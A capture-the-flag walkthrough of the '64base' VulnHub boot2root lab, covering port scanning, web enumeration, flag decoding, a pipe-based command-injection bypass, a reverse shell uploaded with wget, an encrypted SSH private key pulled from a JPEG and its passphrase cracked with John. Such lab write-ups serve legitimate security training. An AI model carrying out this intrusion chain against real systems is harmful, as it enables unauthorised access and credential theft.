64Base: 1.0.1
Location
https://download.vulnhub.com/64base/64Base_3mrgnc3.ova
Introduction
Author: @3mrgnc3
This is the first public Boot2Root by this author. It is intended to be more of a fun game than a serious hacking challenge, is based on the Star Wars storyline and is designed to troll you in a fun way. The author warns up front that it is littered with more than a few "Red Herrings".
The difficulty rating is beginner – intermediate.
The main goal is to capture 6 flags, each in the format of flag1{ZXhhbXBsZSBmbGFnCg==}.
Getting started
Starting with an nmap scan of all TCP ports.
┌─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.3

Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-03 08:08 CET
Nmap scan report for 192.168.171.3
Host is up (0.00045s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 429 disallowed entries (15 shown)
| /administrator/ /admin/ /login/ /88888/ /88888888/
| /88888888888/ /88888888888P/ /c3P08P/ /C3p0/ /A280/ /above/ /AC1/
|_/across/ /activation/ /Adjustments/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: 64base
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 59:a5:02:ba:72:8a:2e:c1:9c:ff:cc:b2:f8:15:66:b3 (DSA)
|   2048 2a:57:2c:75:8c:34:9f:28:84:15:07:2a:be:d0:41:98 (RSA)
|_  256 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91 (ECDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.65 seconds
So the website has a 'robots.txt', the SSH server sits on an alternate port (62964), and two ports (22 and 4899) are reported as tcpwrapped: the TCP handshake completed but the service closed the connection before nmap could fingerprint it, which is worth a manual look. Let's start with some banner grabbing.
┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:22
The programs included with the Fedora GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
#
A login from the future, from 010.101.010.001. Binary perhaps? Read that way it would be 2521. Another port? After a while I conclude there is nothing here and I get my first taste of trolling: port 22 only prints a fake login banner (a Fedora one at that, on what nmap says is a Debian box) and never speaks SSH.
┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:80
HTTP/1.1 200 OK
Date: Tue, 03 Jan 2017 09:04:50 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
ETag: "1fdf-542f6bd9b68a0"
Accept-Ranges: bytes
Content-Length: 8159
Vary: Accept-Encoding
Content-Type: text/html
Port 80 seems ok. Nothing special here.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:4899
sshhh! ssh! droids!
So.. You found a way in then... but, can you pop root?
/~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________
Nice banner.
┌─[n13mant@planetmars]─[~]
└──╼ $curl -I 192.168.171.3:62964
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
Protocol mismatch.
curl: (56) Recv failure: Connection reset by peer
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh 192.168.171.3 -p 62964
The authenticity of host '[192.168.171.3]:62964 ([192.168.171.3]:62964)' can't be established.
ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.171.3]:62964' (ECDSA) to the list of known hosts.
n13mant@192.168.171.3's password:
The real SSH server only gives its version string (curl sent it an HTTP request, hence the 'Protocol mismatch' and the reset); there is no pre-auth banner to read here.
On to the webserver.
When I browse to the website I spot a string that looks like base64.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'dmlldyBzb3VyY2UgO0QK' | base64 -d
view source ;D
Looks like I found the first 'beginners hint', LOL. In the page source there is a string that looks like hex. Time for another round of decoding.
┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a' | xxd -r -p | base64 -d
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==' | base64 -d
64base:Th353@r3N0TdaDr01DzU@reL00K1ing4
Got my first flag, and its payload looks like a username:password pair (64base:Th353@r3N0TdaDr01DzU@reL00K1ing4) that may pay off further down the road.
Looking at the rest of the pages I noticed some randomly placed words with the same indentation. Collected in order, they read:
everybody with must die
With what? There wasn’t another word with the same indentation. So for now I move on.
On the /post.html page there is a cool ASCII art poster with an interesting bottom.
A ‘real Imperial-Class BountyHunter’? Maybe a hint for changing my user-agent?
The rest of the pages didn't look like they had anything of value.
Next is 'robots.txt'. It is a big list (429 entries) and most of the pages look empty. To make this manageable I save the list to a file, strip the first 11 characters of every line ('Disallow: /') with 'cut', and run the result through wfuzz, hiding 404s, to weed out the useless entries. Two pages look worth investigating.
┌─[n13mant@planetmars]─[~]
└──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --hc 404 --hw 0 http://192.168.171.3/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://192.168.171.3/FUZZ
Total requests: 429
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00000:  C=401     14 L       54 W          460 Ch        "/admin/"
00377:  C=301      9 L       28 W          311 Ch        "/ZZ"

Total time: 0.489533
Processed Requests: 429
Filtered Requests: 427
Requests/sec.: 876.3438
But looking at the complete wfuzz output I noticed there were a lot of 404s (which is why I had filtered them in the first place). Why would a 'robots.txt' list entries that don't exist? A genuine disallow list points at real content, so the 404s are themselves a signal. I re-run wfuzz, this time showing only the 404s.
┌─[n13mant@planetmars]─[~]
└──╼ $wfuzz -c -z file,/home/n13mant/Desktop/sw.lst --sc 404 http://192.168.171.3/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://192.168.171.3/FUZZ
Total requests: 429
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00001:  C=404      9 L       32 W          291 Ch        "/administrator..."
00003:  C=404      9 L       32 W          283 Ch        "/login/"
00147:  C=404      9 L       32 W          283 Ch        "/-HH--/"
00166:  C=404      9 L       32 W          280 Ch        "/-l/"
00202:  C=404      9 L       32 W          280 Ch        "/-o/"
00203:  C=404      9 L       32 W          283 Ch        "/-nn--/"
00205:  C=404      9 L       32 W          294 Ch        "/o88888/888888..."
00208:  C=404      9 L       32 W          288 Ch        "/Office/r/s/"
00209:  C=404      9 L       32 W          286 Ch        "/Office/r/"
00215:  C=404      9 L       32 W          285 Ch        "/oo/----/"
00216:  C=404      9 L       32 W          293 Ch        "/o/-----------..."
00272:  C=404      9 L       32 W          282 Ch        "/-Row/"
00324:  C=404      9 L       32 W          295 Ch        "/thousand/thou..."
00370:  C=404      9 L       32 W          295 Ch        "/XXXXX/XXXXX/X..."
00382:  C=404      9 L       32 W          286 Ch        "/office/s/"
00392:  C=404      9 L       32 W          292 Ch        "/Imperial-clas..."

Total time: 0.511337
Processed Requests: 429
Filtered Requests: 413
Requests/sec.: 838.9754
(Another way of doing this was to spider the site with burpsuite. Should give a similar result.)
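The robots.txt-to-wordlist step above, written out as an added Python example (this is not code from the walkthrough or from the challenge author). parse_robots() does what the 'cut' trick does, but keyed on the 'Disallow:' directive rather than a column position, and it drops duplicates so the fuzzer does not repeat requests; case_collisions() adds the check that later turned out to matter on this box, namely entries that differ from a known path only in letter case; probe() is an optional HEAD sweep that needs network access and is only run if you call it. The sample robots.txt is constructed and merely modelled on the listing in the nmap output; the "Imperial-class" spelling in it is assumed for the sake of the example.

```python
"""Build a fuzzing wordlist from robots.txt and flag case-mangled entries.

Added example for this walkthrough; not the challenge author's code.
"""
import re
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed sample, modelled on the 64base listing. The real file has 429
# entries; the "Imperial-class" spelling is assumed here to show the case check.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /administrator/
Disallow: /admin/
Disallow: /login/
Disallow: /88888/
Disallow: /Imperial-class/
Disallow: /admin/
"""

DISALLOW = re.compile(r"^\s*Disallow:\s*(\S+)", re.IGNORECASE)


def parse_robots(text):
    """Return the unique Disallow paths in file order, leading slash removed.

    Same effect as cutting the first 11 characters ("Disallow: /") of each
    line, but it tolerates extra whitespace or a missing leading slash and
    drops duplicates so wfuzz does not send the same request twice.
    """
    seen, paths = set(), []
    for line in text.splitlines():
        match = DISALLOW.match(line)
        if not match:
            continue
        path = match.group(1).lstrip("/")
        if path and path not in seen:
            seen.add(path)
            paths.append(path)
    return paths


def case_collisions(paths, hint):
    """Entries equal to `hint` ignoring case but spelled differently.

    Apache on Linux resolves paths case-sensitively, so a robots.txt entry
    that is "almost" the real directory name returns 404 while the correctly
    cased name exists. That one-letter difference is easy to miss by eye.
    """
    return [p for p in paths if p.lower() == hint.lower() and p != hint]


def probe(base_url, paths, timeout=5):
    """HEAD every path and return {path: HTTP status}. Needs network access."""
    statuses = {}
    for path in paths:
        req = Request(base_url.rstrip("/") + "/" + path, method="HEAD")
        try:
            with urlopen(req, timeout=timeout) as resp:
                statuses[path] = resp.getcode()
        except HTTPError as err:      # 401/404/... still carry a status code
            statuses[path] = err.code
    return statuses


if __name__ == "__main__":
    wordlist = parse_robots(SAMPLE_ROBOTS)
    print("\n".join(wordlist))        # save this as the wfuzz/dirb wordlist
    print(case_collisions(wordlist, "Imperial-Class/"))
```

Feed the printed list to wfuzz as before; the useful twist is to keep the 404 entries rather than hiding them and run case_collisions() against any path you have from a hint elsewhere on the site.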
Because I’m getting nowhere with the 404 results, I start with the found admin site. Maybe the clues and credentials I collected earlier will pay off.
I tried the credentials from flag1, but they didn't work. So I tried again, this time with the clue about being an Imperial-Class BountyHunter: after changing my user-agent and trying to log in again it still wouldn't let me in. I was missing something.
Being stuck, I went over my notes and after a while (a long while) noticed that 'Imperial-Class' in the poster and 'Imperial-clas...' in the 'robots.txt' list were spelled slightly differently: a single letter's case. Apache on Linux treats paths case-sensitively, so the robots entry 404s while the correctly cased directory exists.
With cURL I request '/Imperial-Class/' (capital C) and this time I get more information: an HTTP Basic auth challenge, and the same 460-byte 401 page that wfuzz reported for '/admin/'.
┌─[n13mant@planetmars]─[~]
└──╼ $curl -vv 192.168.171.3/Imperial-Class/
*   Trying 192.168.171.3...
* Connected to 192.168.171.3 (192.168.171.3) port 80 (#0)
> GET /Imperial-Class/ HTTP/1.1
> Host: 192.168.171.3
> User-Agent: curl/7.50.1
> Accept: */*
>
< HTTP/1.1 401 Unauthorized
< Date: Tue, 03 Jan 2017 09:56:26 GMT
< Server: Apache/2.4.10 (Debian)
< WWW-Authenticate: Basic realm="Authorization Required"
< Content-Length: 460
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.</p>
<hr>
<address>Apache/2.4.10 (Debian) Server at 192.168.171.3 Port 80</address>
</body></html>
* Connection #0 to host 192.168.171.3 left intact
Another login prompt, this time HTTP Basic auth. The credentials from flag1 worked just fine here.
Checking the source code it seems I was still missing something.
<!-- don't forget the BountyHunter login -->
To help my search I used cewl to build a wordlist from all the words on the main site and ran it through dirb, passing the Basic auth credentials with -u.
┌─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.171.3/Imperial-Class/ /home/n13mant/Desktop/sw-list.txt -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jan 3 12:21:55 2017
URL_BASE: http://192.168.171.3/Imperial-Class/
WORDLIST_FILES: /home/n13mant/Desktop/sw-list.txt
AUTHORIZATION: 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

-----------------

GENERATED WORDS: 672

---- Scanning URL: http://192.168.171.3/Imperial-Class/ ----
==> DIRECTORY: http://192.168.171.3/Imperial-Class/BountyHunter/

---- Entering directory: http://192.168.171.3/Imperial-Class/BountyHunter/ ----

-----------------
END_TIME: Tue Jan 3 12:21:57 2017
DOWNLOADED: 1344 - FOUND: 0
As the comment said……wow.
Checking the source of 'login.php' gives some additional information.
<body bgcolor=#000000><font color=#cfbf00>
<form name="login-form" id="login-form" method="post" action="./login.php">
<fieldset>
<legend>Please login:</legend>
<dl>
<dt>
<label title="Username">Username:
<input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" />
</label>
</dt>
</dl>
<dl>
<dt>
<label title="Password">Password:
<input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" />
</label>
</dt>
</dl>
<dl>
<dt>
<label title="Submit">
<input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" />
<!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->
</label>
</dt>
</dl>
</fieldset>
</form>
Three hex strings, in the two id attributes and the basictoken comment. The field names, 'function' and 'command', are suggestive too.
┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p
ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWV
┌─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756' | xxd -r -p | base64 -d
flag2{aHR0cHM6Ly93d3cue
base64: invalid input
Each string is only a fragment: the base64 it decodes to is cut off, hence the 'invalid input'. Concatenating the three hex strings in page order (username id, password id, basictoken) and decoding the whole gives the second flag.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo '5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a' | xxd -r -p | base64 -d
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=' | base64 -d
Time for some videos on YouTube.
Darth Vader belching……..didn’t see that one coming. Nice way of saying I need to use burpsuite.
Logging in with the same credentials as before gives the third flag.
The decoded content of the third flag reads like something I had already seen in a previous hint: (IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377).
And there is the fourth flag thanks to remote code execution.
flag4{64base:64base5h377}
Looks like more credentials.
There are a few commands I can execute, like ps, netstat and ls, which gives some information about the system.
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:62964           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:4899            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::62964                :::*                    LISTEN      -
tcp6       0      0 ::1:25                  :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
When I try to use netcat I get another troll.
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░ ░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░ ░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░ ░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░ ░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░ ░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░ ░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░ ░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░ ░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░ ░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░ ░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░ ░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░ ░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░ ░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░ ░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░ ░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░ ░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░ ░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░ ░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░ ░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█ ░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█ Is this the net cat you are looking for?
Later on I found out there was another command I could use, namely wget.
With it I tried to fetch a test file onto the machine, but that didn't work out so well. After a while it was clear that a filter was in place; what kind, I didn't know yet.
Because the 'f' parameter accepts several function names (e.g. exec, system), I tried 'var_dump', which prints structured information about a variable, hoping to see which characters were being filtered.
Bummer: every character I used got filtered, so I needed a bypass. The only character that isn't filtered is '|' (pipe). And because my input appears to be handed to this '64base' binary, I need to break out of it to run 'wget' and pull a file onto the remote system.
Trying 'uname' on its own didn't work, since I was trapped inside 64base, but as the pipe character isn't filtered I could use it to escape, with success.
Now to get a reverse shell script onto the machine. For this I used the reverse shell script from pentestmonkey; after uploading it and running it I got a shell.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.4] 53825
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
 06:20:22 up 23:29,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@64base:/64base$ strings well_done_:D
strings well_done_:D
sshhh! ssh! droids!
So.. You found a way in then... but, can you pop root?
/~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________
Found the troll from earlier: the banner that port 4899 prints is this file, well_done_:D, in /64base.
And when I pipe into 'more' I get trolled again 🙂
www-data@64base:~/html$ ls -aRl | more
ls -aRl | more
███╗ ███╗ ██████╗ ██████╗ ███████╗██████╗ ████╗ ████║██╔═══██╗██╔══██╗██╔════╝╚════██╗ ██╔████╔██║██║ ██║██████╔╝█████╗ ▄███╔╝ ██║╚██╔╝██║██║ ██║██╔══██╗██╔══╝ ▀▀══╝ ██║ ╚═╝ ██║╚██████╔╝██║ ██║███████╗ ██╗ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ ███╗ ███╗ ██████╗ ██████╗ ██████╗ ███████╗██╗██╗ ████╗ ████║██╔═══██╗██╔══██╗██╔══██╗██╔════╝██║██║ ██╔████╔██║██║ ██║██████╔╝██████╔╝█████╗ ██║██║ ██║╚██╔╝██║██║ ██║██╔══██╗██╔══██╗██╔══╝ ╚═╝╚═╝ ██║ ╚═╝ ██║╚██████╔╝██║ ██║██║ ██║███████╗██╗██╗ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝╚═╝ ██╗ ██╗ ██████╗ ██╗ ██╗ ██╗ ██╗ █████╗ ███╗ ██╗████████╗ ╚██╗ ██╔╝██╔═══██╗██║ ██║ ██║ ██║██╔══██╗████╗ ██║╚══██╔══╝ ╚████╔╝ ██║ ██║██║ ██║ ██║ █╗ ██║███████║██╔██╗ ██║ ██║ ╚██╔╝ ██║ ██║██║ ██║ ██║███╗██║██╔══██║██║╚██╗██║ ██║ ██║ ╚██████╔╝╚██████╔╝ ╚███╔███╔╝██║ ██║██║ ╚████║ ██║ ╚═╝ ╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ███╗ ███╗ ██████╗ ██████╗ ███████╗██╗██╗██████╗ ████╗ ████║██╔═══██╗██╔══██╗██╔════╝██║██║╚════██╗ ██╔████╔██║██║ ██║██████╔╝█████╗ ██║██║ ▄███╔╝ ██║╚██╔╝██║██║ ██║██╔══██╗██╔══╝ ╚═╝╚═╝ ▀▀══╝ ██║ ╚═╝ ██║╚██████╔╝██║ ██║███████╗██╗██╗ ██╗ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝╚═╝ ╚═╝
ls: write error: Broken pipe
After some more searching I found flag number 5. Note the file mode, -------r--: owner and group have no access, only 'other' can read it, and www-data is 'other' here, so the root ownership does not get in the way.
www-data@64base:~/html$ cd .admin
cd .admin
bash: cd: .admin: No such file or directory
www-data@64base:~/html$ cd ./admin
cd ./admin
www-data@64base:~/html/admin$ ls -lah
ls -lah
total 28K
drwxr-xr-x   3 www-data www-data 4.0K Dec  6 03:00 .
drwxr-xr-x 431 www-data www-data  12K Dec  6 02:41 ..
-rw-r--r--   1 www-data www-data  113 Dec  6 02:25 .htaccess
drwxr-xr-x   2 root     root     4.0K Dec  6 03:00 S3cR37
-rwxr-xr-x   1 www-data www-data  139 Nov 30 07:02 index.php
www-data@64base:~/html/admin$ cd S3cR37
cd S3cR37
www-data@64base:~/html/admin/S3cR37$ ls -lah
ls -lah
total 200K
drwxr-xr-x 2 root     root     4.0K Dec  6 03:00 .
drwxr-xr-x 3 www-data www-data 4.0K Dec  6 03:00 ..
-------r-- 1 root     root     192K Nov 30 11:31 flag5{TG9vayBJbnNpZGUhIDpECg==}
www-data@64base:~/html/admin/S3cR37$ echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
echo TG9vayBJbnNpZGUhIDpECg== | base64 -d
Look Inside! :D
www-data@64base:~/html/admin/S3cR37$ file flag5{TG9vayBJbnNpZGUhIDpECg==}
file flag5{TG9vayBJbnNpZGUhIDpECg==}
flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3
A picture. I could download it to my machine, but instead I run strings on it and find a long hex string at the top: the JPEG comment field, of which 'file' already showed the beginning. Hex-decoding it gives base64, and decoding that gives a passphrase-protected RSA private key (the Proc-Type/DEK-Info headers say AES-128-CBC).
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C

mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
+T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
+j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
/Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
-----END RSA PRIVATE KEY-----
The only thing I haven't tried is the SSH server on port 62964. (The VM has picked up a new address in the meantime, 192.168.171.4, as the reverse shell connection already showed; the ECDSA host key fingerprint is the same as before, so it is the same box.)
┌─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
The authenticity of host '[192.168.171.4]:62964 ([192.168.171.4]:62964)' can't be established.
ECDSA key fingerprint is SHA256:PhC0Efn/NWWhDzqb57DDh6SKn5feUean+PfxWhASzx4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.171.4]:62964' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for './Desktop/sshkey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "./Desktop/sshkey": bad permissions
root@192.168.171.4's password:
Wrong permissions: ssh refuses to use a private key file that is readable by others.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $chmod 400 ./Desktop/sshkey
┌─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
Enter passphrase for key './Desktop/sshkey':
A passphrase. Time for some cracking.
John needs the key's encryption parameters in its own hash format, so I use 'ssh2john' to convert the private key.
┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh2john sshkey > converted_key
Now load the file into John and use the well-known rockyou wordlist to hopefully crack the passphrase.
┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $john converted_key --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
usetheforce      (sshkey)
1g 0:00:00:01 DONE (2017-01-05 15:48) 0.8196g/s 467452p/s 467452c/s 467452C/s usetheforce
Use the "--show" option to display all of the cracked passwords reliably
Session completed
After a split second I got the passphrase: usetheforce.
For this task I could also have used Phrasen|drescher instead, but John worked out just fine.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $ssh root@192.168.171.4 -p 62964 -i ./Desktop/sshkey
